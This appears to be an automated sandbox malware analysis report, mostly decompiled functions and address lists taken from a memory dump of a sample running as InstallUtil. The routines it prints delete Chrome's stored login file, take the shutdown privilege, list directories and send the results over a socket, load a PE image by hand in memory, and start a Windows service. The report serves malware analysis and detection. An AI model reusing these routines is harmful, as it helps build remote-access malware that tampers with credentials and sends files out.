0x00000000
0x0044533f
0x00445342
0x00445329
0x00445348
0x00445348
0x0044534a
0x0044534e
0x0044534e
0x00445353
0x00445355
0x00445358
0x0044535b
0x0044535d
0x00445360
0x00445378
0x0044537b
0x0044537e
0x00445386
0x0044538b
0x00445390
0x00000000
0x00445390
0x00445362
0x00445367
0x0044536a
0x0044536f
0x00445372
0x00445374
0x00000000
0x00000000
0x00445376
0x004452c3
0x00000000
0x004452aa
0x0044521d
0x0044521d
0x0044521f
0x00445221
0x00445221
0x00445225
0x00000000
0x00000000
0x00445229
0x0044523d
0x0044523d
0x0044522b
0x0044522b
0x0044522b
0x00445231
0x00000000
0x00445233
0x00445233
0x00445236
0x0044523b
0x00000000
0x00000000
0x00000000
0x00000000
0x0044523b
0x00445231
0x00445246
0x00445248
0x00445397
0x00445397
0x0044524e
0x0044524e
0x00000000
0x0044524e
0x00000000
0x00445248
0x00445241
0x00445243
0x00445243
0x00000000
0x00445243
0x0044521b
0x00000000

APIs

_free.LIBCMT ref: 00445252
_free.LIBCMT ref: 00445276
_free.LIBCMT ref: 004453FD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045A1E4), ref: 0044540F
WideCharToMultiByte.KERNEL32(00000000,00000000,0046D754,000000FF,00000000,0000003F,00000000,?,?), ref: 00445487
WideCharToMultiByte.KERNEL32(00000000,00000000,0046D7A8,000000FF,?,0000003F,00000000,?), ref: 004454B4
_free.LIBCMT ref: 004455C9

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: ccb01b9f61ee37204e0d058bd606834b52582125d6865a8725df1f60326a2acd
Instruction ID: f7821a7f91d3f0875b1a28afb9d9e7c779d5ce74aedd7f64ab9f5502304d4b62
Opcode Fuzzy Hash: ccb01b9f61ee37204e0d058bd606834b52582125d6865a8725df1f60326a2acd
Instruction Fuzzy Hash: 89C12971E00605ABEF209F79D841BAEBBB8EF41354F2441AFE88097352E7788D41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0A6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040A0A6(void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t34;

				_t37 = __eflags;
				_t32 = __edi;
				_t31 = E00402053(_t20,  &_v52, __edx, _t33, E00438A1A(_t20, __eflags, "UserProfile"));
				E0040793B(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				E00401F98();
				if(DeleteFileA(E00401F6B( &_v28)) != 0) {
					_t28 = _t34 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t34 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						E00402053(_t20, _t28, _t31, _t33);
						E0040A863(_t20, _t31, _t33, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401F98();
				return _t21;
			}

0x0040a0a6
0x0040a0a6
0x0040a0c6
0x0040a0cb
0x0040a0d4
0x0040a0ea
0x0040a110
0x0040a112
0x00000000
0x0040a0ec
0x0040a0f3
0x0040a0f6
0x0040a104
0x0040a106
0x0040a117
0x0040a117
0x0040a11c
0x0040a121
0x0040a0fd
0x0040a0fd
0x0040a0fd
0x0040a0f6
0x0040a129
0x0040a134

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A0E2
GetLastError.KERNEL32 ref: 0040A0EC

Strings

[Chrome StoredLogins not found], xrefs: 0040A106
[Chrome StoredLogins found, cleared!], xrefs: 0040A112
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A0AD
UserProfile, xrefs: 0040A0B2

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: a18a139ebd7b82c054f2b14b7fb6b520271391f881b6674baf680895b31c56a9
Instruction ID: cc28d4b774cce22835b38506fa5559332eac456bc2567109f0b87182df8d41ff
Opcode Fuzzy Hash: a18a139ebd7b82c054f2b14b7fb6b520271391f881b6674baf680895b31c56a9
Instruction Fuzzy Hash: B801F731A442166BCB047676DC1BCBE7724A922748F54017FF0027A1E2FD79591686CF

Uniqueness

Uniqueness Score: -1.00%

Function 00414706 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414706() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}

0x0041471a
0x0041472c
0x00414738
0x00414744
0x0041474b
0x00414760

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00414713
OpenProcessToken.ADVAPI32(00000000), ref: 0041471A
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041472C
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041474B
GetLastError.KERNEL32 ref: 00414751

Strings

SeShutdownPrivilege, xrefs: 00414726

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 5a5671f6900c515d0edc4424fdf7b3e8b23515ad87101631e9f6bb88c789e1ee
Instruction ID: 1c9adcd754f811f8294ea553a0228dc096f64ae90ce9137a5c4824f07943dca2
Opcode Fuzzy Hash: 5a5671f6900c515d0edc4424fdf7b3e8b23515ad87101631e9f6bb88c789e1ee
Instruction Fuzzy Hash: 9CF05E75801228BBDB109B90ED4DEEF7FBCEF4571AF110060F905A6152D6388A84DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00407AC0 Relevance: 9.3, APIs: 6, Instructions: 293
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00407AC0(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t101;
				intOrPtr* _t106;
				signed int _t116;
				void* _t128;
				void* _t149;
				void* _t152;
				signed int _t154;
				signed int _t167;
				signed int _t180;
				signed int _t182;
				void* _t265;
				void* _t267;
				void* _t273;
				void* _t275;
				intOrPtr _t276;
				void* _t277;
				void* _t280;

				_t182 = __ecx;
				E00453798(E00453B73, _t273);
				_t276 = _t275 - 0x300;
				_push(_t265);
				 *((intOrPtr*)(_t273 - 0x10)) = _t276;
				_t180 = _t182;
				 *(_t273 - 0x18) = _t180;
				E0040209F(_t180, _t273 - 0x9c);
				 *(_t273 - 0x1c) =  *(_t273 - 0x1c) | 0xffffffff;
				 *_t180 = 0;
				 *(_t273 - 4) =  *(_t273 - 4) & 0x00000000;
				_t260 = _t180 + 4;
				E00404804(_t180 + 4);
				_t101 = E0040489F(_t180 + 4, _t265, _t180 + 4);
				_t282 = _t101;
				if(_t101 == 0) {
					_push(0);
					_push(0);
					goto L4;
				} else {
					_t276 = _t276 - 0x18;
					_t258 = E00402EF1(_t273 - 0x6c, _t273 + 0x38, _t273, 0x46e260);
					E00402ED0(_t180, _t276, _t174, _t273, _t282, _t273 + 0x50);
					_push(0x64);
					_t180 = _t180 & 0xffffff00 | E00404A78(_t260, _t174, _t282) == 0xffffffff;
					E00401F98();
					if(_t180 != 0) {
						E00404DFD(_t258);
						 *((intOrPtr*)(_t273 - 0x20)) = 1;
						_push(0x469620);
						_t152 = _t273 - 0x20;
						L3:
						_push(_t152);
						L4:
						E00435A36();
					}
				}
				_t261 = E004022C5(_t273 + 0x20, _t273 - 0x30);
				_t106 = E0040228A(_t273 + 0x20, _t273 - 0x34);
				E00408448(_t273 - 0x3c,  *((intOrPtr*)(E004022C5(_t273 + 0x20, _t273 - 0x38))),  *_t106,  *_t104);
				_t277 = _t276 + 0xc;
				_t252 = _t273 + 8;
				_t267 = FindFirstFileW(E00401EC4(E004078F9(_t273 - 0x6c, _t273 + 8, _t273, "*")), _t273 - 0x304);
				 *(_t273 - 0x1c) = _t267;
				E00401EC9();
				_t285 = _t267 - 0xffffffff;
				if(_t267 != 0xffffffff) {
					goto L7;
				} else {
					_t276 = _t277 - 0x18;
					E00402053(_t180, _t276, _t252, _t273, 0x461084);
					_push(0x65);
					E00404A78( *(_t273 - 0x18) + 4, _t252, _t285);
					E00404DFD(_t252);
					 *((intOrPtr*)(_t273 - 0x24)) = 2;
					_push(0x469620);
					_t152 = _t273 - 0x24;
					goto L3;
				}
				while(1) {
					L7:
					_t116 = FindNextFileW(_t267, _t273 - 0x304);
					__eflags = _t116;
					if(_t116 == 0) {
						break;
					}
					_t180 =  *(_t273 - 0x18);
					__eflags =  *_t180;
					if( *_t180 == 0) {
						__eflags =  *(_t273 - 0x304) & 0x00000010;
						if(( *(_t273 - 0x304) & 0x00000010) == 0) {
							L17:
							E0040413E(_t180, _t273 - 0x84, _t252, _t273, _t273 - 0x2d8);
							_t261 = E004022C5(_t273 - 0x84, _t273 - 0x3c);
							_t270 = E0040228A(_t273 - 0x84, _t273 - 0x38);
							E00408448(_t273 - 0x30,  *((intOrPtr*)(E004022C5(_t273 - 0x84, _t273 - 0x34))),  *_t134,  *_t132);
							_t277 = _t277 + 0xc;
							__eflags = E004082CB(_t273 - 0x84, _t273 + 0x20, 0) - 0xffffffff;
							if(__eflags == 0) {
								L20:
								E00401EC9();
								_t267 =  *(_t273 - 0x1c);
								continue;
							} else {
								E00401FA2(_t273 - 0x9c, _t252, _t270, E00402077(_t180, _t273 - 0x54, _t252, _t273, __eflags, _t273 - 0x304, 0x250));
								E00401F98();
								_t277 = _t277 - 0x18;
								_t252 = E00402ED0(_t180, _t273 - 0x54, E00418445(_t180, _t273 - 0xb4, _t273 + 8), _t273, __eflags, 0x46e260);
								E00402ED0(_t180, _t277, _t147, _t273, __eflags, _t273 - 0x9c);
								_push(0x66);
								_t149 = E00404A78(_t180 + 4, _t147, __eflags);
								__eflags = _t149 - 0xffffffff;
								_t180 = _t180 & 0xffffff00 | _t149 == 0xffffffff;
								E00401F98();
								E00401F98();
								__eflags = _t180;
								if(_t180 == 0) {
									goto L20;
								} else {
									 *((intOrPtr*)(_t273 - 0x2c)) = 4;
									_push(0x469620);
									_t152 = _t273 - 0x2c;
									goto L3;
								}
							}
						} else {
							_t154 = E00438B0D(_t273 - 0x2d8, _t273 - 0x2d8, ".");
							__eflags = _t154;
							if(_t154 == 0) {
								goto L17;
							} else {
								__eflags = E00438B0D(_t273 - 0x2d8, _t273 - 0x2d8, L"..");
								if(__eflags == 0) {
									goto L17;
								} else {
									_t252 = E004079C1(_t180, _t273 - 0xb4, _t273 + 8, _t273, __eflags, E0040413E(_t180, _t273 - 0x54, _t252, _t273, _t273 - 0x2d8));
									E00402FD4(_t180, _t273 - 0x6c, _t159, _t261, _t273, __eflags, "\\");
									E00401EC9();
									E00401EC9();
									_t280 = _t277 - 0x18;
									E0040773A(_t180, _t280, _t159, __eflags, _t273 + 0x20);
									_t277 = _t280 - 0x18;
									E0040773A(_t180, _t277, _t159, __eflags, _t273 - 0x6c);
									_t167 = E00407ED2(_t180, _t159, __eflags);
									__eflags = _t167;
									if(_t167 != 0) {
										E00401EC9();
										goto L17;
									} else {
										 *((intOrPtr*)(_t273 - 0x28)) = 3;
										_push(0x469620);
										_t152 = _t273 - 0x28;
										goto L3;
									}
								}
							}
						}
						L23:
						E00401F98();
						E00401EC9();
						E00401EC9();
						E00401F98();
						_t128 = E00401F98();
						 *[fs:0x0] =  *((intOrPtr*)(_t273 - 0xc));
						return _t128;
					} else {
						FindClose(_t267);
					}
					L10:
					E00404DFD(_t252);
					goto L23;
				}
				 *(_t273 - 4) =  *(_t273 - 4) | 0xffffffff;
				FindClose(_t267);
				_t252 = E00402EF1(_t273 - 0x54, _t273 + 0x38, _t273, 0x46e260);
				E00402ED0(_t180, _t277 - 0x18, _t119, _t273, __eflags, _t273 + 0x50);
				_push(0x67);
				E00404A78( *(_t273 - 0x18) + 4, _t119, __eflags);
				E00401F98();
				goto L10;
			}

0x00407ac0
0x00407ac5
0x00407aca
0x00407ad1
0x00407ad3
0x00407ad6
0x00407ad8
0x00407ae1
0x00407ae6
0x00407aea
0x00407aed
0x00407af1
0x00407af6
0x00407afe
0x00407b03
0x00407b05
0x00407e6d
0x00407e6f
0x00000000
0x00407b0b
0x00407b0b
0x00407b25
0x00407b29
0x00407b2f
0x00407b3b
0x00407b41
0x00407b48
0x00407b4c
0x00407b51
0x00407b58
0x00407b5d
0x00407b60
0x00407b60
0x00407b61
0x00407b61
0x00407b61
0x00407b48
0x00407b72
0x00407b7b
0x00407b97
0x00407b9c
0x00407bab
0x00407bc5
0x00407bc7
0x00407bcd
0x00407bd2
0x00407bd5
0x00000000
0x00407bd7
0x00407bd7
0x00407be1
0x00407be6
0x00407bee
0x00407bf6
0x00407bfb
0x00407c02
0x00407c07
0x00000000
0x00407c07
0x00407c0f
0x00407c0f
0x00407c17
0x00407c1d
0x00407c1f
0x00000000
0x00000000
0x00407c25
0x00407c28
0x00407c2b
0x00407c41
0x00407c48
0x00407d09
0x00407d16
0x00407d2a
0x00407d3b
0x00407d55
0x00407d5a
0x00407d6e
0x00407d71
0x00407e0e
0x00407e14
0x00407e19
0x00000000
0x00407d77
0x00407d92
0x00407d9a
0x00407d9f
0x00407dc9
0x00407dcd
0x00407dd3
0x00407dd8
0x00407ddd
0x00407de0
0x00407de6
0x00407df1
0x00407df6
0x00407df8
0x00000000
0x00407dfa
0x00407dfa
0x00407e01
0x00407e06
0x00000000
0x00407e06
0x00407df8
0x00407c4e
0x00407c5a
0x00407c61
0x00407c63
0x00000000
0x00407c69
0x00407c7c
0x00407c7e
0x00000000
0x00407c84
0x00407ca8
0x00407cad
0x00407cb9
0x00407cc1
0x00407cc6
0x00407ccf
0x00407cd4
0x00407cdd
0x00407ce4
0x00407ce9
0x00407ceb
0x00407d04
0x00000000
0x00407ced
0x00407ced
0x00407cf4
0x00407cf9
0x00000000
0x00407cf9
0x00407ceb
0x00407c7e
0x00407c63
0x00407e94
0x00407e9a
0x00407ea2
0x00407eaa
0x00407eb2
0x00407eba
0x00407ec2
0x00407ecf
0x00407c2d
0x00407c2e
0x00407c34
0x00407c37
0x00407c37
0x00000000
0x00407c37
0x00407e21
0x00407e26
0x00407e49
0x00407e4d
0x00407e53
0x00407e58
0x00407e60
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00407AC5

Part of subcall function 0040489F: connect.WS2_32(FFFFFFFF,?,?), ref: 004048B7

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

__CxxThrowException@8.LIBVCRUNTIME ref: 00407B61
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00407BBF
FindNextFileW.KERNEL32(00000000,?), ref: 00407C17
FindClose.KERNEL32(00000000), ref: 00407C2E

Part of subcall function 00404DFD: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E278,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E0F
Part of subcall function 00404DFD: SetEvent.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E1A
Part of subcall function 00404DFD: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E23

FindClose.KERNEL32(00000000), ref: 00407E26

Part of subcall function 00404A78: WaitForSingleObject.KERNEL32(00000000,00000000,TT@s,?,?,00000004,?,?,00000004,?,0046E278,R@), ref: 00404B1E
Part of subcall function 00404A78: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,0046E278,R@,?,?,?,?,?,00405454), ref: 00404B4C

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
String ID:
API String ID: 2435342581-0
Opcode ID: 83ad3c1b75d2af4a5de5189c40dd5593f20660b41cdc5c834f3f25449f138c7d
Instruction ID: 25bbee52f1dc94610b5c8265aa6f19644755407f49a30b22f0f3444576a4632b
Opcode Fuzzy Hash: 83ad3c1b75d2af4a5de5189c40dd5593f20660b41cdc5c834f3f25449f138c7d
Instruction Fuzzy Hash: CEB17F719001099BCB14FBA1DD96AED7379AF04308F1041BFF506B61E2EF786A49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F87E Relevance: 9.2, APIs: 6, Instructions: 206
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040F87E(intOrPtr* __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t52;
				signed int _t55;
				void* _t58;
				signed int _t66;
				signed int _t68;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t77;
				signed int _t78;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				void* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t104;
				void* _t106;
				signed int _t109;
				void* _t115;
				void* _t116;
				signed int _t117;
				signed int _t119;
				void* _t121;
				signed int _t123;
				signed int _t126;
				void* _t127;
				void* _t128;

				_t106 = 0x40;
				 *((intOrPtr*)(_t127 + 0x10)) = __edx;
				 *((intOrPtr*)(_t127 + 0xc)) = __ecx;
				_t119 = 0;
				if(E0040F326(__edx, _t106) != 0) {
					__eflags =  *__ecx - 0x5a4d;
					if( *__ecx == 0x5a4d) {
						_t52 = E0040F326(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
						__eflags = _t52;
						if(_t52 == 0) {
							goto L1;
						}
						_t90 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
						__eflags =  *_t90 - 0x4550;
						if( *_t90 != 0x4550) {
							goto L3;
						}
						__eflags =  *((intOrPtr*)(_t90 + 4)) - 0x14c;
						if( *((intOrPtr*)(_t90 + 4)) != 0x14c) {
							goto L3;
						}
						__eflags =  *(_t90 + 0x38) & 0x00000001;
						if(( *(_t90 + 0x38) & 0x00000001) != 0) {
							goto L3;
						}
						_t109 =  *(_t90 + 6) & 0x0000ffff;
						_t55 =  *(_t90 + 0x14) & 0x0000ffff;
						__eflags = _t109;
						if(_t109 == 0) {
							L14:
							__imp__GetNativeSystemInfo(_t127 + 0x18, _t115);
							_t116 = E0040F315( *((intOrPtr*)(_t90 + 0x50)),  *((intOrPtr*)(_t127 + 0x1c)));
							_t58 = E0040F315(_t119,  *((intOrPtr*)(_t127 + 0x1c)));
							__eflags = _t116 - _t58;
							if(_t116 == _t58) {
								_push(0);
								_t126 = E0040F823( *((intOrPtr*)(_t90 + 0x34)), _t116, 0x3000, 4);
								_t128 = _t127 + 0x14;
								__eflags = _t126;
								if(_t126 != 0) {
									L20:
									_t117 = HeapAlloc(GetProcessHeap(), 8, 0x40);
									__eflags = _t117;
									if(_t117 != 0) {
										 *(_t117 + 4) = _t126;
										 *((intOrPtr*)(_t117 + 0x1c)) = E0040F823;
										 *(_t117 + 0x14) = ( *(_t90 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
										 *((intOrPtr*)(_t117 + 0x20)) = E0040F83A;
										 *((intOrPtr*)(_t117 + 0x24)) = E0040F84D;
										 *((intOrPtr*)(_t117 + 0x28)) = E0040F858;
										 *((intOrPtr*)(_t117 + 0x2c)) = E0040F867;
										 *((intOrPtr*)(_t117 + 0x34)) = 0;
										 *((intOrPtr*)(_t117 + 0x3c)) =  *((intOrPtr*)(_t128 + 0x1c));
										_t66 = E0040F326( *((intOrPtr*)(_t128 + 0x14)),  *((intOrPtr*)(_t90 + 0x54)));
										__eflags = _t66;
										if(_t66 == 0) {
											L34:
											E0040FBF7(_t117);
											L35:
											_t68 = 0;
											__eflags = 0;
											L36:
											return _t68;
										}
										_push(0);
										_t121 = E0040F823(_t126,  *((intOrPtr*)(_t90 + 0x54)), 0x1000, 4);
										E00433220(_t121,  *((intOrPtr*)(_t128 + 0x28)),  *((intOrPtr*)(_t90 + 0x54)));
										_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x30)) + 0x3c)) + _t121;
										 *_t117 = _t73;
										 *(_t73 + 0x34) = _t126;
										_t74 = E0040F339( *((intOrPtr*)(_t128 + 0x34)), _t90, _t117);
										__eflags = _t74;
										if(_t74 == 0) {
											goto L34;
										}
										_t75 =  *_t117;
										_t114 =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
										__eflags =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
										if( *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34))) {
											_t123 = 1;
											__eflags = 1;
											 *((intOrPtr*)(_t117 + 0x18)) = 1;
										} else {
											 *((intOrPtr*)(_t117 + 0x18)) = E0040F63D(_t114);
											_t123 = 1;
										}
										__eflags = E0040F6E9(_t117);
										if(__eflags != 0) {
											_t77 = E0040F4D9(_t117, __eflags);
											__eflags = _t77;
											if(_t77 == 0) {
												goto L34;
											}
											_t78 = E0040F60C(_t117);
											__eflags = _t78;
											if(_t78 == 0) {
												goto L34;
											}
											_t80 =  *( *_t117 + 0x28);
											__eflags = _t80;
											if(_t80 == 0) {
												_t48 = _t117 + 0x38;
												 *_t48 =  *(_t117 + 0x38) & 0x00000000;
												__eflags =  *_t48;
												L41:
												_t68 = _t117;
												goto L36;
											}
											_t81 = _t80 + _t126;
											__eflags =  *(_t117 + 0x14);
											if( *(_t117 + 0x14) == 0) {
												 *(_t117 + 0x38) = _t81;
												goto L41;
											}
											_t82 =  *_t81(_t126, _t123, 0);
											__eflags = _t82;
											if(_t82 != 0) {
												 *((intOrPtr*)(_t117 + 0x10)) = _t123;
												goto L41;
											}
											SetLastError(0x45a);
										}
										goto L34;
									}
									_push(0);
									E0040F83A(_t126, 0, 0x8000);
									L19:
									SetLastError(0xe);
									L16:
									goto L35;
								}
								_push(0);
								_t126 = E0040F823(0, _t116, 0x3000, 4);
								_t128 = _t128 + 0x14;
								__eflags = _t126;
								if(_t126 != 0) {
									goto L20;
								}
								goto L19;
							}
							SetLastError(0xc1);
							goto L16;
						}
						_t104 = _t90 + 0x24 + _t55;
						__eflags = _t104;
						do {
							__eflags =  *(_t104 + 4);
							_t86 =  *_t104;
							if( *(_t104 + 4) != 0) {
								_t87 = _t86 +  *(_t104 + 4);
								__eflags = _t87;
							} else {
								_t87 = _t86 +  *(_t90 + 0x38);
							}
							__eflags = _t87 - _t119;
							_t119 =  >  ? _t87 : _t119;
							_t104 = _t104 + 0x28;
							_t109 = _t109 - 1;
							__eflags = _t109;
						} while (_t109 != 0);
						goto L14;
					}
					L3:
					SetLastError(0xc1);
				}
				L1:
				return 0;
			}

0x0040f88a
0x0040f88d
0x0040f891
0x0040f895
0x0040f89e
0x0040f8ac
0x0040f8b0
0x0040f8ca
0x0040f8cf
0x0040f8d1
0x00000000
0x00000000
0x0040f8d6
0x0040f8d8
0x0040f8de
0x00000000
0x00000000
0x0040f8e5
0x0040f8e9
0x00000000
0x00000000
0x0040f8eb
0x0040f8ef
0x00000000
0x00000000
0x0040f8f1
0x0040f8f5
0x0040f8f9
0x0040f8fb
0x0040f91f
0x0040f925
0x0040f939
0x0040f93b
0x0040f940
0x0040f942
0x0040f956
0x0040f967
0x0040f969
0x0040f96c
0x0040f96e
0x0040f98c
0x0040f99d
0x0040f99f
0x0040f9a1
0x0040f9b9
0x0040f9c6
0x0040f9cd
0x0040f9d0
0x0040f9d7
0x0040f9de
0x0040f9e5
0x0040f9ec
0x0040f9f3
0x0040f9f9
0x0040f9fe
0x0040fa00
0x0040fab0
0x0040fab2
0x0040fab7
0x0040fab7
0x0040fab7
0x0040fab9
0x00000000
0x0040fab9
0x0040fa06
0x0040fa1a
0x0040fa21
0x0040fa36
0x0040fa38
0x0040fa3b
0x0040fa3e
0x0040fa46
0x0040fa48
0x00000000
0x00000000
0x0040fa4a
0x0040fa4f
0x0040fa4f
0x0040fa52
0x0040fa65
0x0040fa65
0x0040fa66
0x0040fa54
0x0040fa5d
0x0040fa60
0x0040fa60
0x0040fa70
0x0040fa72
0x0040fa76
0x0040fa7b
0x0040fa7d
0x00000000
0x00000000
0x0040fa81
0x0040fa86
0x0040fa88
0x00000000
0x00000000
0x0040fa8c
0x0040fa8f
0x0040fa91
0x0040facb
0x0040facb
0x0040facb
0x0040facf
0x0040facf
0x00000000
0x0040facf
0x0040fa93
0x0040fa95
0x0040fa99
0x0040fac6
0x00000000
0x0040fac6
0x0040fa9f
0x0040faa1
0x0040faa3
0x0040fac1
0x00000000
0x0040fac1
0x0040faaa
0x0040faaa
0x00000000
0x0040fa72
0x0040f9a3
0x0040f9ab
0x0040f988
0x0040f949
0x0040f949
0x00000000
0x0040f949
0x0040f970
0x0040f97f
0x0040f981
0x0040f984
0x0040f986
0x00000000
0x00000000
0x00000000
0x0040f986
0x0040f949
0x00000000
0x0040f949
0x0040f900
0x0040f900
0x0040f902
0x0040f902
0x0040f906
0x0040f908
0x0040f90f
0x0040f90f
0x0040f90a
0x0040f90a
0x0040f90a
0x0040f912
0x0040f914
0x0040f917
0x0040f91a
0x0040f91a
0x0040f91a
0x00000000
0x0040f902
0x0040f8b2
0x0040f8b7
0x0040f8b7
0x0040f8a0
0x00000000

APIs

Part of subcall function 0040F326: SetLastError.KERNEL32(0000000D,0040F89C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040F87A), ref: 0040F32C

SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040F87A), ref: 0040F8B7
GetNativeSystemInfo.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040F87A), ref: 0040F925
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0040F949

Part of subcall function 0040F823: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0040F967,?,00000000,00003000,00000004,00000000,?,?), ref: 0040F833

GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 0040F990
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040F997
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040FAAA

Part of subcall function 0040FBF7: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0040FAB7,?,?,?,?,?), ref: 0040FC67
Part of subcall function 0040FBF7: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0040FC6E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID:
API String ID: 3950776272-0
Opcode ID: 19d652ee8e1fb37ac5de54ebff74aad87dafd3a3e9403f28f8fe0abb4e70e05e
Instruction ID: 33a7be61e84aa27883bb0b1c105bc9acfd387aff3ff777454e050ee7d3b0b444
Opcode Fuzzy Hash: 19d652ee8e1fb37ac5de54ebff74aad87dafd3a3e9403f28f8fe0abb4e70e05e
Instruction Fuzzy Hash: F561E471600201ABD770AF65C881B6B7AA5BF84704F54803AED05ABBC2D7BCD859CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 004172C8 Relevance: 9.0, APIs: 6, Instructions: 39
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004172C8(char _a4) {
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t18 = OpenSCManagerW(0, 0, 0x10);
				_t17 = OpenServiceW(_t18, E00401EC4( &_a4), 0x10);
				if(_t17 != 0) {
					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				E00401EC9();
				return _t14;
			}

0x004172cd
0x004172dd
0x004172ec
0x004172f0
0x0041730d
0x00417310
0x00417313
0x004172f2
0x004172f3
0x004172f3
0x00417319
0x00417323

APIs

